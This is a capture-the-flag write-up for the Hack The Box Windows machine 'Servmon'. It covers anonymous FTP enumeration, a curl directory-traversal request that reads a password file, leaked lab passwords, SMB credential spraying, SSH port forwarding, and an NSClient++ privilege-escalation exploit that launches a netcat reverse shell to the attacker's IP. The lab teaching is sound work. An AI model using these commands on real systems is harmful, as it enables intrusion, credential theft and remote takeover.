Servmon HTB - WriteUP
Servmon - 10.129.48.113
Reconnaissance
Nmap Recon Results
Discovery OS System
ttl = 127 Windows System
Recon Nmap open ports
Service Enumeration
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 12:05PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6699/tcp open napster?
8443/tcp open ssl/https-alt
Web Service Information
Enumeration
As it can be seen from the above nmap scan that ftp allows anonymous service. So, letโs enumerate the FTP service by connecting to it as anonymous. We have a directory called Users. Inside that directory, we found two users named Nadine and Nathan. Now letโs go inside a directory namedย Nadine we have a file with txt extension named Confidential.txt. After downloading this txt file we went inside a directory named Nathan and found another file with txt extension named Notes to do.txt and we quickly downloaded this file in our terminal.
Ftp Services
we found the following file inside the directorys on ftp service
Confidential.txt
Notes-To-Do.txt
- Possible Users
- Nathan
- Nadine
After downloading both files to our terminal we logged out of FTP and decided to take a look at the files. Confidential.txt told us that a password has been left on Desktop of Nathan and notes to do.txt file asked us to complete the leftover task and told us about three services NVMS, NSClient and SharePoint. And we know that the NVMS is behind port 80 and NSClient is behind port 8443.
Web Service Information
http://10.129.48.113/Pages/login.htm
we tried with default credentials in the service, but we had no luck … also from what we read in the note we can deduce that it is not the correct way
https://10.129.48.113:8443/index.html
Identifying vulnerabilities As we were not able to get out hands on credentials in our initial enumeration. We will have to figure out a different way to get through this Authorization Login Panel of NVMS-1000.So we used the searchsploit to search for any available exploits.
Nvms 1000
NSClient
as can see we have a potential exploit to privilege escalation if we found valid credentials to abuse of the NSCLIENT++ Services
Explotation
Directory Traversal
Burpsuite
Or with Curl \
curl -s -X GET "http://10.129.48.113/../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt" --path-as-is
We saw that exploit told us that it is an unauthenticated directory traversal vulnerability which exists in TVT network surveillance management software-1000 version 3.4.1. NVMS listens by default on port 80.ย Since we already know there is password.txt located on Desktop of Nathan so we will now try to extract the content of Password.txt using curl with its option โpath-as-is so that the path provided in URL does remove any DOT segments.
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
-NsClient
Brute Force with Crackmapexec
We have a username and password, so we tried to bruteforce the smb service to found valid credentials on the target system and we were successfully able to log in with ssh.
cmpe smb 10.129.48.113 -u users -p passwords
- Valid credentials :
- Nadine : L1k3B1gBut7s@W0rk
SSH Login with Nadine Credentials
Privilege Escalation
Now itโs time to escalate privileges on the lab. Now if we go back to Notes file we discovered during ftp login we got to know that there is NSClient on which user has worked. Next, we enumerated the user directory to look into the Program Files directory.
Directory of C:\\Program Files
After entering Program Files we found another interesting directory named NSClient which was mentioned in Notes file we found during ftp login. Now letโs dive inside the NSClient directory.
Here we found a file with .ini extension named nsclient.in seems like it contains some kind of text-based content which can be useful for us for moving. It may also contain some kind of password for Admin just a guess.
Password : ew2x6SsGTxjRwXOT
Now if we recall Nathanโs Notes to do.txt it talked about locking down NSClient so here it is confirmed from the above screenshot which states only localhost(127.0.0.1) is allowed to access. NSClient is working on port 8443 which is opened on localhost(127.0.0.1).
Since we know ssh is enabled so we can perform Local ssh tunnelling which will make our work easier. Now again we switch into Kali Linux for local tunnelling.
Execute given below command for forwarding port to the local machine.
Local Port Forwarding
ssh -L 8443:127.0.0.1:8443 nadine@10.129.48.113 -fNT
The next thing we will do is get a shell as administrator using netcat shells (i tried nishang but it seems to be blocked by antivirus)
I copied a netcat listener to the box in C:/Temp directory and
I did set up a listener on my box
we will execute the exploit that we found previously to privesc
python3 exploit-NSCLIENT.py -t 127.0.0.1 -P 8443 -p ew2x6SsGTxjRwXOT -c 'c:\temp\nc.exe -e cmd.exe 10.10.14.31 443'
Now we are nt_authority
